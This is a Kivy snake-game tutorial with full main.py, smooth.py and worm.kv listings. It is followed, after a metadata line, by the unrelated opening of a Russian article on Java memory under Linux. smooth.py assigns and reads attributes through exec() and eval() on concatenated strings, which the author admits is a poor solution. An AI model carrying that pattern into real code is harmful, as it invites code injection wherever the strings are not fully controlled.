P. S. We wouldn't do it if we dealt with classical on\_draw. But here we don't have to program on\_draw.
Let's fix the worm.kv file:
```
:
:
canvas:
Rectangle:
size: self.graphical\_size
pos: self.graphical\_pos
```
and main.py:
```
...
from kivy.properties import *
...
class Cell(Widget):
graphical_size = ListProperty([1, 1])
graphical_pos = ListProperty([1, 1])
def __init__(self, x, y, size, margin=4):
super().__init__()
self.actual_size = (size, size)
self.graphical_size = (size - margin, size - margin)
self.margin = margin
self.actual_pos = (x, y)
self.graphical_pos_attach()
def graphical_pos_attach(self):
self.graphical_pos = (self.actual_pos[0] - self.graphical_size[0] / 2, self.actual_pos[1] - self.graphical_size[1] / 2)
...
class Form(Widget):
def __init__(self):
super().__init__()
self.cell1 = Cell(100, 100, 30)
self.cell2 = Cell(130, 100, 30)
self.add_widget(self.cell1)
self.add_widget(self.cell2)
...
```

The margin appeared so it looks pretty although we created the second cell with X = 130 instead of 132. Later, we will make smooth motion based on the distance between actual\_pos and graphical\_pos.
Coding the worm
===============
### Implementation
Init config in main.py
```
class Config:
DEFAULT_LENGTH = 20
CELL_SIZE = 25
APPLE_SIZE = 35
MARGIN = 4
INTERVAL = 0.2
DEAD_CELL = (1, 0, 0, 1)
APPLE_COLOR = (1, 1, 0, 1)
```
(Trust me, you'll love it!)
Then, assign config to the app:
```
class WormApp(App):
def __init__(self):
super().__init__()
self.config = Config()
self.form = Form(self.config)
def build(self):
self.form.start()
return self.form
```
Rewrite init and start:
```
class Form(Widget):
def __init__(self, config):
super().__init__()
self.config = config
self.worm = None
def start(self):
self.worm = Worm(self.config)
self.add_widget(self.worm)
Clock.schedule_interval(self.update, self.config.INTERVAL)
```
Then, the Cell:
```
class Cell(Widget):
graphical_size = ListProperty([1, 1])
graphical_pos = ListProperty([1, 1])
def __init__(self, x, y, size, margin=4):
super().__init__()
self.actual_size = (size, size)
self.graphical_size = (size - margin, size - margin)
self.margin = margin
self.actual_pos = (x, y)
self.graphical_pos_attach()
def graphical_pos_attach(self):
self.graphical_pos = (self.actual_pos[0] - self.graphical_size[0] / 2, self.actual_pos[1] - self.graphical_size[1] / 2)
def move_to(self, x, y):
self.actual_pos = (x, y)
self.graphical_pos_attach()
def move_by(self, x, y, **kwargs):
self.move_to(self.actual_pos[0] + x, self.actual_pos[1] + y, **kwargs)
def get_pos(self):
return self.actual_pos
def step_by(self, direction, **kwargs):
self.move_by(self.actual_size[0] * direction[0], self.actual_size[1] * direction[1], **kwargs)
```
Hopefully, it's more or less clear.
and finally the Worm:
```
class Worm(Widget):
def __init__(self, config):
super().__init__()
self.cells = []
self.config = config
self.cell_size = config.CELL_SIZE
self.head_init((100, 100))
for i in range(config.DEFAULT_LENGTH):
self.lengthen()
def destroy(self):
for i in range(len(self.cells)):
self.remove_widget(self.cells[i])
self.cells = []
def lengthen(self, pos=None, direction=(0, 1)):
# If pos is set, we put the cell in pos, otherwise accordingly to the specified direction
if pos is None:
px = self.cells[-1].get_pos()[0] + direction[0] * self.cell_size
py = self.cells[-1].get_pos()[1] + direction[1] * self.cell_size
pos = (px, py)
self.cells.append(Cell(*pos, self.cell_size, margin=self.config.MARGIN))
self.add_widget(self.cells[-1])
def head_init(self, pos):
self.lengthen(pos=pos)
```
Let's give life to our wormie.

### Motion
Now we will make it move.
It's simple:
```
class Worm(Widget):
...
def move(self, direction):
for i in range(len(self.cells) - 1, 0, -1):
self.cells[i].move_to(*self.cells[i - 1].get_pos())
self.cells[0].step_by(direction)
```
```
class Form(Widget):
def __init__(self, config):
super().__init__()
self.config = config
self.worm = None
self.cur_dir = (0, 0)
def start(self):
self.worm = Worm(self.config)
self.add_widget(self.worm)
self.cur_dir = (1, 0)
Clock.schedule_interval(self.update, self.config.INTERVAL)
def update(self, _):
self.worm.move(self.cur_dir)
```

It's alive! It's alive!
### Controlling
As you could judge by the preview image, the controls of the snake will be the following:

```
class Form(Widget):
...
def on_touch_down(self, touch):
ws = touch.x / self.size[0]
hs = touch.y / self.size[1]
aws = 1 - ws
if ws > hs and aws > hs:
cur_dir = (0, -1) # Down
elif ws > hs >= aws:
cur_dir = (1, 0) # Right
elif ws <= hs < aws:
cur_dir = (-1, 0) # Left
else:
cur_dir = (0, 1) # Up
self.cur_dir = cur_dir
```

Cool.
### Creating the fruit
First, we initialize it.
```
class Form(Widget):
...
def __init__(self, config):
super().__init__()
self.config = config
self.worm = None
self.cur_dir = (0, 0)
self.fruit = None
...
def random_cell_location(self, offset):
x_row = self.size[0] // self.config.CELL_SIZE
x_col = self.size[1] // self.config.CELL_SIZE
return random.randint(offset, x_row - offset), random.randint(offset, x_col - offset)
def random_location(self, offset):
x_row, x_col = self.random_cell_location(offset)
return self.config.CELL_SIZE * x_row, self.config.CELL_SIZE * x_col
def fruit_dislocate(self):
x, y = self.random_location(2)
self.fruit.move_to(x, y)
...
def start(self):
self.fruit = Cell(0, 0, self.config.APPLE_SIZE, self.config.MARGIN)
self.worm = Worm(self.config)
self.fruit_dislocate()
self.add_widget(self.worm)
self.add_widget(self.fruit)
self.cur_dir = (1, 0)
Clock.schedule_interval(self.update, self.config.INTERVAL)
```
The current result:

Now we should implement some Worm methods:
```
class Worm(Widget):
...
# Here we get all the positions of our cells
def gather_positions(self):
return [cell.get_pos() for cell in self.cells]
# Just check if our head has the same position as another Cell
def head_intersect(self, cell):
return self.cells[0].get_pos() == cell.get_pos()
```
**Other benefits of gather\_positions**
By the way, after we implemented gather\_positions, we can change fruit\_dislocate:
```
class Form(Widget):
def fruit_dislocate(self):
x, y = self.random_location(2)
while (x, y) in self.worm.gather_positions():
x, y = self.random_location(2)
self.fruit.move_to(x, y)
```
At this point, the fruit won't be located in the worm's tile.
...and add this check to update()
```
class Form(Widget):
...
def update(self, _):
self.worm.move(self.cur_dir)
if self.worm.head_intersect(self.fruit):
directions = [(0, 1), (0, -1), (1, 0), (-1, 0)]
self.worm.lengthen(direction=random.choice(directions))
self.fruit_dislocate()
```
### Detection of self tile hitting
We want to know whether the head has the same position as one of the worm's cells.
```
class Form(Widget):
...
def __init__(self, config):
super().__init__()
self.config = config
self.worm = None
self.cur_dir = (0, 0)
self.fruit = None
self.game_on = True
def update(self, _):
if not self.game_on:
return
self.worm.move(self.cur_dir)
if self.worm.head_intersect(self.fruit):
directions = [(0, 1), (0, -1), (1, 0), (-1, 0)]
self.worm.lengthen(direction=random.choice(directions))
self.fruit_dislocate()
if self.worm_bite_self():
self.game_on = False
def worm_bite_self(self):
for cell in self.worm.cells[1:]:
if self.worm.head_intersect(cell):
return cell
return False
```

### Coloring, decorating, and code refactoring
Let's start with code refactoring.
Rewrite and add
```
class Form(Widget):
...
def start(self):
self.worm = Worm(self.config)
self.add_widget(self.worm)
if self.fruit is not None:
self.remove_widget(self.fruit)
self.fruit = Cell(0, 0, self.config.APPLE_SIZE)
self.fruit_dislocate()
self.add_widget(self.fruit)
Clock.schedule_interval(self.update, self.config.INTERVAL)
self.game_on = True
self.cur_dir = (0, -1)
def stop(self):
self.game_on = False
Clock.unschedule(self.update)
def game_over(self):
self.stop()
...
def on_touch_down(self, touch):
if not self.game_on:
self.worm.destroy()
self.start()
return
...
```
Now if the worm is dead (frozen), if you tap again, the game will be reset.
Now let's go to decorating and coloring.
worm.kv
```
:
popup\_label: popup\_label
score\_label: score\_label
canvas:
Color:
rgba: (.5, .5, .5, 1.0)
Line:
width: 1.5
points: (0, 0), self.size
Line:
width: 1.5
points: (self.size[0], 0), (0, self.size[1])
Label:
id: score\_label
text: "Score: " + str(self.parent.worm\_len)
width: self.width
Label:
id: popup\_label
width: self.width
:
:
canvas:
Color:
rgba: self.color
Rectangle:
size: self.graphical\_size
pos: self.graphical\_pos
```
Rewrite WormApp:
```
class WormApp(App):
def build(self):
self.config = Config()
self.form = Form(self.config)
return self.form
def on_start(self):
self.form.start()
```

Let's color it. Rewrite Cell in .kv:
```
:
canvas:
Color:
rgba: self.color
Rectangle:
size: self.graphical\_size
pos: self.graphical\_pos
```
Add this to Cell.\_\_init\_\_
```
self.color = (0.2, 1.0, 0.2, 1.0) #
```
and this to Form.start
```
self.fruit.color = (1.0, 0.2, 0.2, 1.0)
```
Great, enjoy your snake

Finally, we will make a «game over» label
```
class Form(Widget):
...
def __init__(self, config):
...
self.popup_label.text = ""
...
def stop(self, text=""):
self.game_on = False
self.popup_label.text = text
Clock.unschedule(self.update)
def game_over(self):
self.stop("GAME OVER" + " " * 5 + "\ntap to reset")
```
and make the hit cell red:
instead of
```
def update(self, _):
...
if self.worm_bite_self():
self.game_over()
...
```
write
```
def update(self, _):
cell = self.worm_bite_self()
if cell:
cell.color = (1.0, 0.2, 0.2, 1.0)
self.game_over()
```

Are you still paying attention? Coming next is the most interesting part.
### Bonus section — smooth motion
Because the worm's step is equal to the cell\_size, it's not that smooth. But we want to make it step as frequently as possible, without rewriting the entire logic of the game. So, we need to create a mechanism moving our graphical poses but not our actual poses. So, I wrote a simple file:
smooth.py
```
from kivy.clock import Clock
import time
class Timing:
@staticmethod
def linear(x):
return x
class Smooth:
def __init__(self, interval=1.0/60.0):
self.objs = []
self.running = False
self.interval = interval
def run(self):
if self.running:
return
self.running = True
Clock.schedule_interval(self.update, self.interval)
def stop(self):
if not self.running:
return
self.running = False
Clock.unschedule(self.update)
def setattr(self, obj, attr, value):
exec("obj." + attr + " = " + str(value))
def getattr(self, obj, attr):
return float(eval("obj." + attr))
def update(self, _):
cur_time = time.time()
for line in self.objs:
obj, prop_name_x, prop_name_y, from_x, from_y, to_x, to_y, start_time, period, timing = line
time_gone = cur_time - start_time
if time_gone >= period:
self.setattr(obj, prop_name_x, to_x)
self.setattr(obj, prop_name_y, to_y)
self.objs.remove(line)
else:
share = time_gone / period
acs = timing(share)
self.setattr(obj, prop_name_x, from_x * (1 - acs) + to_x * acs)
self.setattr(obj, prop_name_y, from_y * (1 - acs) + to_y * acs)
if len(self.objs) == 0:
self.stop()
def move_to(self, obj, prop_name_x, prop_name_y, to_x, to_y, t, timing=Timing.linear):
self.objs.append((obj, prop_name_x, prop_name_y, self.getattr(obj, prop_name_x), self.getattr(obj, prop_name_y), to_x,
to_y, time.time(), t, timing))
self.run()
class XSmooth(Smooth):
def __init__(self, props, timing=Timing.linear, *args, **kwargs):
super().__init__(*args, **kwargs)
self.props = props
self.timing = timing
def move_to(self, obj, to_x, to_y, t):
super().move_to(obj, *self.props, to_x, to_y, t, timing=self.timing)
```
**To those who dislike my code**
This module is not the most elegant solution ©. It's a bad solution and I acknowledge it. It is an only-hello-world solution.
So you just create smooth.py and copy-paste this code to the file.
Finally, let's make it work:
```
class Form(Widget):
...
def __init__(self, config):
...
self.smooth = smooth.XSmooth(["graphical_pos[0]", "graphical_pos[1]"])
```
Then we replace self.worm.move() with
```
class Form(Widget):
...
def update(self, _):
...
self.worm.move(self.cur_dir, smooth_motion=(self.smooth, self.config.INTERVAL))
```
And this is how methods of Cell should look like
```
class Cell(Widget):
...
def graphical_pos_attach(self, smooth_motion=None):
to_x, to_y = self.actual_pos[0] - self.graphical_size[0] / 2, self.actual_pos[1] - self.graphical_size[1] / 2
if smooth_motion is None:
self.graphical_pos = to_x, to_y
else:
smoother, t = smooth_motion
smoother.move_to(self, to_x, to_y, t)
def move_to(self, x, y, **kwargs):
self.actual_pos = (x, y)
self.graphical_pos_attach(**kwargs)
def move_by(self, x, y, **kwargs):
self.move_to(self.actual_pos[0] + x, self.actual_pos[1] + y, **kwargs)
```
That's it, thank you for your attention!
How the final result works:
**The final code**
**main.py**
```
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.clock import Clock
from kivy.properties import *
import random
import smooth
class Cell(Widget):
graphical_size = ListProperty([1, 1])
graphical_pos = ListProperty([1, 1])
color = ListProperty([1, 1, 1, 1])
def __init__(self, x, y, size, margin=4):
super().__init__()
self.actual_size = (size, size)
self.graphical_size = (size - margin, size - margin)
self.margin = margin
self.actual_pos = (x, y)
self.graphical_pos_attach()
self.color = (0.2, 1.0, 0.2, 1.0)
def graphical_pos_attach(self, smooth_motion=None):
to_x, to_y = self.actual_pos[0] - self.graphical_size[0] / 2, self.actual_pos[1] - self.graphical_size[1] / 2
if smooth_motion is None:
self.graphical_pos = to_x, to_y
else:
smoother, t = smooth_motion
smoother.move_to(self, to_x, to_y, t)
def move_to(self, x, y, **kwargs):
self.actual_pos = (x, y)
self.graphical_pos_attach(**kwargs)
def move_by(self, x, y, **kwargs):
self.move_to(self.actual_pos[0] + x, self.actual_pos[1] + y, **kwargs)
def get_pos(self):
return self.actual_pos
def step_by(self, direction, **kwargs):
self.move_by(self.actual_size[0] * direction[0], self.actual_size[1] * direction[1], **kwargs)
class Worm(Widget):
def __init__(self, config):
super().__init__()
self.cells = []
self.config = config
self.cell_size = config.CELL_SIZE
self.head_init((100, 100))
for i in range(config.DEFAULT_LENGTH):
self.lengthen()
def destroy(self):
for i in range(len(self.cells)):
self.remove_widget(self.cells[i])
self.cells = []
def lengthen(self, pos=None, direction=(0, 1)):
if pos is None:
px = self.cells[-1].get_pos()[0] + direction[0] * self.cell_size
py = self.cells[-1].get_pos()[1] + direction[1] * self.cell_size
pos = (px, py)
self.cells.append(Cell(*pos, self.cell_size, margin=self.config.MARGIN))
self.add_widget(self.cells[-1])
def head_init(self, pos):
self.lengthen(pos=pos)
def move(self, direction, **kwargs):
for i in range(len(self.cells) - 1, 0, -1):
self.cells[i].move_to(*self.cells[i - 1].get_pos(), **kwargs)
self.cells[0].step_by(direction, **kwargs)
def gather_positions(self):
return [cell.get_pos() for cell in self.cells]
def head_intersect(self, cell):
return self.cells[0].get_pos() == cell.get_pos()
class Form(Widget):
worm_len = NumericProperty(0)
def __init__(self, config):
super().__init__()
self.config = config
self.worm = None
self.cur_dir = (0, 0)
self.fruit = None
self.game_on = True
self.smooth = smooth.XSmooth(["graphical_pos[0]", "graphical_pos[1]"])
def random_cell_location(self, offset):
x_row = self.size[0] // self.config.CELL_SIZE
x_col = self.size[1] // self.config.CELL_SIZE
return random.randint(offset, x_row - offset), random.randint(offset, x_col - offset)
def random_location(self, offset):
x_row, x_col = self.random_cell_location(offset)
return self.config.CELL_SIZE * x_row, self.config.CELL_SIZE * x_col
def fruit_dislocate(self):
x, y = self.random_location(2)
while (x, y) in self.worm.gather_positions():
x, y = self.random_location(2)
self.fruit.move_to(x, y)
def start(self):
self.worm = Worm(self.config)
self.add_widget(self.worm)
if self.fruit is not None:
self.remove_widget(self.fruit)
self.fruit = Cell(0, 0, self.config.APPLE_SIZE)
self.fruit.color = (1.0, 0.2, 0.2, 1.0)
self.fruit_dislocate()
self.add_widget(self.fruit)
self.game_on = True
self.cur_dir = (0, -1)
Clock.schedule_interval(self.update, self.config.INTERVAL)
self.popup_label.text = ""
def stop(self, text=""):
self.game_on = False
self.popup_label.text = text
Clock.unschedule(self.update)
def game_over(self):
self.stop("GAME OVER" + " " * 5 + "\ntap to reset")
def align_labels(self):
try:
self.popup_label.pos = ((self.size[0] - self.popup_label.width) / 2, self.size[1] / 2)
self.score_label.pos = ((self.size[0] - self.score_label.width) / 2, self.size[1] - 80)
except:
print(self.__dict__)
assert False
def update(self, _):
if not self.game_on:
return
self.worm.move(self.cur_dir, smooth_motion=(self.smooth, self.config.INTERVAL))
if self.worm.head_intersect(self.fruit):
directions = [(0, 1), (0, -1), (1, 0), (-1, 0)]
self.worm.lengthen(direction=random.choice(directions))
self.fruit_dislocate()
cell = self.worm_bite_self()
if cell:
cell.color = (1.0, 0.2, 0.2, 1.0)
self.game_over()
self.worm_len = len(self.worm.cells)
self.align_labels()
def on_touch_down(self, touch):
if not self.game_on:
self.worm.destroy()
self.start()
return
ws = touch.x / self.size[0]
hs = touch.y / self.size[1]
aws = 1 - ws
if ws > hs and aws > hs:
cur_dir = (0, -1)
elif ws > hs >= aws:
cur_dir = (1, 0)
elif ws <= hs < aws:
cur_dir = (-1, 0)
else:
cur_dir = (0, 1)
self.cur_dir = cur_dir
def worm_bite_self(self):
for cell in self.worm.cells[1:]:
if self.worm.head_intersect(cell):
return cell
return False
class Config:
DEFAULT_LENGTH = 20
CELL_SIZE = 25
APPLE_SIZE = 35
MARGIN = 4
INTERVAL = 0.3
DEAD_CELL = (1, 0, 0, 1)
APPLE_COLOR = (1, 1, 0, 1)
class WormApp(App):
def build(self):
self.config = Config()
self.form = Form(self.config)
return self.form
def on_start(self):
self.form.start()
if __name__ == '__main__':
WormApp().run()
```
**smooth.py**
```
from kivy.clock import Clock
import time
class Timing:
@staticmethod
def linear(x):
return x
class Smooth:
def __init__(self, interval=1.0/60.0):
self.objs = []
self.running = False
self.interval = interval
def run(self):
if self.running:
return
self.running = True
Clock.schedule_interval(self.update, self.interval)
def stop(self):
if not self.running:
return
self.running = False
Clock.unschedule(self.update)
def setattr(self, obj, attr, value):
exec("obj." + attr + " = " + str(value))
def getattr(self, obj, attr):
return float(eval("obj." + attr))
def update(self, _):
cur_time = time.time()
for line in self.objs:
obj, prop_name_x, prop_name_y, from_x, from_y, to_x, to_y, start_time, period, timing = line
time_gone = cur_time - start_time
if time_gone >= period:
self.setattr(obj, prop_name_x, to_x)
self.setattr(obj, prop_name_y, to_y)
self.objs.remove(line)
else:
share = time_gone / period
acs = timing(share)
self.setattr(obj, prop_name_x, from_x * (1 - acs) + to_x * acs)
self.setattr(obj, prop_name_y, from_y * (1 - acs) + to_y * acs)
if len(self.objs) == 0:
self.stop()
def move_to(self, obj, prop_name_x, prop_name_y, to_x, to_y, t, timing=Timing.linear):
self.objs.append((obj, prop_name_x, prop_name_y, self.getattr(obj, prop_name_x), self.getattr(obj, prop_name_y), to_x,
to_y, time.time(), t, timing))
self.run()
class XSmooth(Smooth):
def __init__(self, props, timing=Timing.linear, *args, **kwargs):
super().__init__(*args, **kwargs)
self.props = props
self.timing = timing
def move_to(self, obj, to_x, to_y, t):
super().move_to(obj, *self.props, to_x, to_y, t, timing=self.timing)
```
**worm.kv**
```
:
popup\_label: popup\_label
score\_label: score\_label
canvas:
Color:
rgba: (.5, .5, .5, 1.0)
Line:
width: 1.5
points: (0, 0), self.size
Line:
width: 1.5
points: (self.size[0], 0), (0, self.size[1])
Label:
id: score\_label
text: "Score: " + str(self.parent.worm\_len)
width: self.width
Label:
id: popup\_label
width: self.width
:
:
canvas:
Color:
rgba: self.color
Rectangle:
size: self.graphical\_size
pos: self.graphical\_pos
```
**Code, adjusted by @tshirtman**
I received some issues with my code, for example, tshirtman, one of the Kivy project contributers, suggested me not to make Cells as Widgets but instead make a Point instruction. However, I don't find this code easier to understand than mine, even though it is definetely nicer in terms of UI and game development. Anyway, the code:
**main.py**
```
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.clock import Clock
from kivy.properties import *
import random
import smooth
class Cell:
def __init__(self, x, y):
self.actual_pos = (x, y)
def move_to(self, x, y):
self.actual_pos = (x, y)
def move_by(self, x, y):
self.move_to(self.actual_pos[0] + x, self.actual_pos[1] + y)
def get_pos(self):
return self.actual_pos
class Fruit(Cell):
def __init__(self, x, y):
super().__init__(x, y)
class Worm(Widget):
margin = NumericProperty(4)
graphical_poses = ListProperty()
inj_pos = ListProperty([-1000, -1000])
graphical_size = NumericProperty(0)
def __init__(self, config, **kwargs):
super().__init__(**kwargs)
self.cells = []
self.config = config
self.cell_size = config.CELL_SIZE
self.head_init((self.config.CELL_SIZE * random.randint(3, 5), self.config.CELL_SIZE * random.randint(3, 5)))
self.margin = config.MARGIN
self.graphical_size = self.cell_size - self.margin
for i in range(config.DEFAULT_LENGTH):
self.lengthen()
def destroy(self):
self.cells = []
self.graphical_poses = []
self.inj_pos = [-1000, -1000]
def cell_append(self, pos):
self.cells.append(Cell(*pos))
self.graphical_poses.extend([0, 0])
self.cell_move_to(len(self.cells) - 1, pos)
def lengthen(self, pos=None, direction=(0, 1)):
if pos is None:
px = self.cells[-1].get_pos()[0] + direction[0] * self.cell_size
py = self.cells[-1].get_pos()[1] + direction[1] * self.cell_size
pos = (px, py)
self.cell_append(pos)
def head_init(self, pos):
self.lengthen(pos=pos)
def cell_move_to(self, i, pos, smooth_motion=None):
self.cells[i].move_to(*pos)
to_x, to_y = pos[0], pos[1]
if smooth_motion is None:
self.graphical_poses[i * 2], self.graphical_poses[i * 2 + 1] = to_x, to_y
else:
smoother, t = smooth_motion
smoother.move_to(self, "graphical_poses[" + str(i * 2) + "]", "graphical_poses[" + str(i * 2 + 1) + "]",
to_x, to_y, t)
def move(self, direction, **kwargs):
for i in range(len(self.cells) - 1, 0, -1):
self.cell_move_to(i, self.cells[i - 1].get_pos(), **kwargs)
self.cell_move_to(0, (self.cells[0].get_pos()[0] + self.cell_size * direction[0], self.cells[0].get_pos()[1] +
self.cell_size * direction[1]), **kwargs)
def gather_positions(self):
return [cell.get_pos() for cell in self.cells]
def head_intersect(self, cell):
return self.cells[0].get_pos() == cell.get_pos()
class Form(Widget):
worm_len = NumericProperty(0)
fruit_pos = ListProperty([0, 0])
fruit_size = NumericProperty(0)
def __init__(self, config, **kwargs):
super().__init__(**kwargs)
self.config = config
self.worm = None
self.cur_dir = (0, 0)
self.fruit = None
self.game_on = True
self.smooth = smooth.Smooth()
def random_cell_location(self, offset):
x_row = self.size[0] // self.config.CELL_SIZE
x_col = self.size[1] // self.config.CELL_SIZE
return random.randint(offset, x_row - offset), random.randint(offset, x_col - offset)
def random_location(self, offset):
x_row, x_col = self.random_cell_location(offset)
return self.config.CELL_SIZE * x_row, self.config.CELL_SIZE * x_col
def fruit_dislocate(self, xy=None):
if xy is not None:
x, y = xy
else:
x, y = self.random_location(2)
while (x, y) in self.worm.gather_positions():
x, y = self.random_location(2)
self.fruit.move_to(x, y)
self.fruit_pos = (x, y)
def start(self):
self.worm = Worm(self.config)
self.add_widget(self.worm)
self.fruit = Fruit(0, 0)
self.fruit_size = self.config.APPLE_SIZE
self.fruit_dislocate()
self.game_on = True
self.cur_dir = (0, -1)
Clock.schedule_interval(self.update, self.config.INTERVAL)
self.popup_label.text = ""
def stop(self, text=""):
self.game_on = False
self.popup_label.text = text
Clock.unschedule(self.update)
def game_over(self):
self.stop("GAME OVER" + " " * 5 + "\ntap to reset")
def align_labels(self):
self.popup_label.pos = ((self.size[0] - self.popup_label.width) / 2, self.size[1] / 2)
self.score_label.pos = ((self.size[0] - self.score_label.width) / 2, self.size[1] - 80)
def update(self, _):
if not self.game_on:
return
self.worm.move(self.cur_dir, smooth_motion=(self.smooth, self.config.INTERVAL))
if self.worm.head_intersect(self.fruit):
directions = [(0, 1), (0, -1), (1, 0), (-1, 0)]
self.worm.lengthen(direction=random.choice(directions))
self.fruit_dislocate()
cell = self.worm_bite_self()
if cell is not None:
self.worm.inj_pos = cell.get_pos()
self.game_over()
self.worm_len = len(self.worm.cells)
self.align_labels()
def on_touch_down(self, touch):
if not self.game_on:
self.worm.destroy()
self.start()
return
ws = touch.x / self.size[0]
hs = touch.y / self.size[1]
aws = 1 - ws
if ws > hs and aws > hs:
cur_dir = (0, -1)
elif ws > hs >= aws:
cur_dir = (1, 0)
elif ws <= hs < aws:
cur_dir = (-1, 0)
else:
cur_dir = (0, 1)
self.cur_dir = cur_dir
def worm_bite_self(self):
for cell in self.worm.cells[1:]:
if self.worm.head_intersect(cell):
return cell
return None
class Config:
DEFAULT_LENGTH = 20
CELL_SIZE = 26 # DO NOT FORGET THAT CELL_SIZE - MARGIN WILL BE DIVIDED BY 4
APPLE_SIZE = 36
MARGIN = 2
INTERVAL = 0.3
DEAD_CELL = (1, 0, 0, 1)
APPLE_COLOR = (1, 1, 0, 1)
class WormApp(App):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.form = None
def build(self, **kwargs):
self.config = Config()
self.form = Form(self.config, **kwargs)
return self.form
def on_start(self):
self.form.start()
if __name__ == '__main__':
WormApp().run()
```
**smooth.py**
```
from kivy.clock import Clock
import time
class Timing:
@staticmethod
def linear(x):
return x
class Smooth:
def __init__(self, interval=1.0/60.0):
self.objs = []
self.running = False
self.interval = interval
def run(self):
if self.running:
return
self.running = True
Clock.schedule_interval(self.update, self.interval)
def stop(self):
if not self.running:
return
self.running = False
Clock.unschedule(self.update)
def set_attr(self, obj, attr, value):
exec("obj." + attr + " = " + str(value))
def get_attr(self, obj, attr):
return float(eval("obj." + attr))
def update(self, _):
cur_time = time.time()
for line in self.objs:
obj, prop_name_x, prop_name_y, from_x, from_y, to_x, to_y, start_time, period, timing = line
time_gone = cur_time - start_time
if time_gone >= period:
self.set_attr(obj, prop_name_x, to_x)
self.set_attr(obj, prop_name_y, to_y)
self.objs.remove(line)
else:
share = time_gone / period
acs = timing(share)
self.set_attr(obj, prop_name_x, from_x * (1 - acs) + to_x * acs)
self.set_attr(obj, prop_name_y, from_y * (1 - acs) + to_y * acs)
if len(self.objs) == 0:
self.stop()
def move_to(self, obj, prop_name_x, prop_name_y, to_x, to_y, t, timing=Timing.linear):
self.objs.append((obj, prop_name_x, prop_name_y, self.get_attr(obj, prop_name_x), self.get_attr(obj, prop_name_y), to_x,
to_y, time.time(), t, timing))
self.run()
class XSmooth(Smooth):
def __init__(self, props, timing=Timing.linear, *args, **kwargs):
super().__init__(*args, **kwargs)
self.props = props
self.timing = timing
def move_to(self, obj, to_x, to_y, t):
super().move_to(obj, *self.props, to_x, to_y, t, timing=self.timing)
```
**worm.kv**
```
:
popup\_label: popup\_label
score\_label: score\_label
canvas:
Color:
rgba: (.5, .5, .5, 1.0)
Line:
width: 1.5
points: (0, 0), self.size
Line:
width: 1.5
points: (self.size[0], 0), (0, self.size[1])
Color:
rgba: (1.0, 0.2, 0.2, 1.0)
Point:
points: self.fruit\_pos
pointsize: self.fruit\_size / 2
Label:
id: score\_label
text: "Score: " + str(self.parent.worm\_len)
width: self.width
Label:
id: popup\_label
width: self.width
:
canvas:
Color:
rgba: (0.2, 1.0, 0.2, 1.0)
Point:
points: self.graphical\_poses
pointsize: self.graphical\_size / 2
Color:
rgba: (1.0, 0.2, 0.2, 1.0)
Point:
points: self.inj\_pos
pointsize: self.graphical\_size / 2
```
Feel free to ask any questions. | https://habr.com/ru/post/465523/ | null | en | null |
# Java и Linux — особенности эксплуатации
Java — очень распространённая платформа, на ней пишут очень разные вещи, начиная от Big Data, заканчивая микросервисами, монолитами, enterprise и прочим. И, как правило, всё это развёртывают на Linux серверах. При этом, соответственно, те люди, которые пишут на Java, зачастую делают это совсем на других операционных системах. Там они:
* пишут код;
* отлаживают, тестируют;
* после этого упаковывают в jar;
* отправляют на Linux, и оно работает.
В том, что оно работает, нет особой магии. Но это приводит к тому, что такие разработчики немножечко «засахариваются» в своём мире кроссплатформенности и не очень хотят разбираться, а **как оно на самом деле работает в реальной операционной системе**.

С другой стороны, есть те, кто занимается администрированием серверов, на их сервера устанавливают JVM, отправляют jar и war-файлы, а с точки зрения мира Linux все это:
* чужеродное;
* проприетарное;
* собирается не из исходников;
* поставляется какими-то jar-архивами;
* «отъедает» всю память на сервере;
* вообще, ведёт себя не по-человечески.
Цель доклада **Алексея Рагозина** на [Highload++](http://www.highload.ru/), расшифровка которого идет далее, была в том, чтобы рассказать особенности **Java для «линуксоидов»** и, соответственно, **Linux — Java-разработчикам**.
Доклад не будет разбором полётов, потому что проблем много, они все интересные, и снаряд дважды в одну воронку не попадает. Поэтому затыкать уже известные «дыры» — пораженческая позиция. Вместо этого поговорим про:
* особенности реализации JVM;
* особенности реализации Linux:
* как они могут не стыковаться.

В Java есть виртуальная машина, и Linux, как и любая другая современная операционная система, по сути, — это тоже виртуальная машина. И в Java и в Linux есть управление **памятью**, **потоки**, **API**.
Слова похожи, но на самом деле под ними очень часто скрываются совершенно разные вещи. Собственно, по этим пунктам мы и пройдёмся, наибольшее внимание уделив памяти.
Память в Java
-------------
Сразу замечу, что я буду говорить только про реализацию **JVM HotSpot,** это Open JDK и Oracle JDK. То есть, наверняка в IBM J9 есть какие-то свои особенности, но я, к сожалению, про них не знаю. Если же мы говорим про HotSpot JVM, то картина мира выглядит следующим образом. Прежде всего в Java есть область, где живут java-объекты — так называемый Heap или, по-русски, куча, где работает сборщик мусора. Эта область памяти, как правило, занимает большую часть пространства процесса. Куча в свою очередь разбита на молодое и старое пространство (Young Gen / Old Gen). Не вдаваясь в дербри сайзинга JVM, важно то, что у JVM есть параметр «-Xmх», определяющий максимальный размер, до которого может вырасти пространство кучи.

А дальше есть много вариантов:
* можно управлять отдельно размерами молодого пространства;
* можно сразу выставить максимальный размер кучи;
* либо дать возможность ему расти постепенно.
Деталей слишком много — важно, что есть лимит. И, в принципе, это общий подход ко всем областям, которые используют JVM. То есть практически все области, перечисленные на картинке выше, имеют определённый лимит. JVM **сразу резервирует** **адресное пространство**, исходя из лимита, а потом **по мере необходимости запрашивает реальные ресурсы памяти** в этом диапазоне. Это важно понимать.
Помимо кучи есть другие потребители памяти. Наиболее важными из них являются области памяти для стеков потоков. Потоки в Java — это обычные linux-потоки, у них есть стек, для которого резервируется определённый размер памяти. Чем больше у вас потоков, тем больше стеков выделено в памяти процесса. Поскольку число потоков в Java может измеряться сотнями и тысячими, иногда эта цифра может становиться достаточно существенной, особенно, если у вас какой-нибудь stateless microservice, в котором куча на 200 Мб, а ThreadPool на 50-100 потоков.
Кроме этого, есть ещё так называемые **NIO** **Direct** **Buffers** — это специальные объекты в Java, которые позволяют **работать с памятью вне кучи**. Они, как правило, используются для работы c I/O, потому что это память, к которой может напрямую обращаться как Си так и Java-код. Соответственно, эта область доступна через API, и у неё тоже есть максимальный лимит.
Остальное — это метаданные, какой-то сгенерированный код, память для них обычно не вырастает до больших величин, но она есть.
Помимо этих специальных областей не надо забывать, что JVM написана на C++, соответственно, там есть
* malloc и обычная аллокация памяти;
* библиотеки, которые подгружаются в JVM (статически или динамически слинкованные, которые тоже могут использовать память).
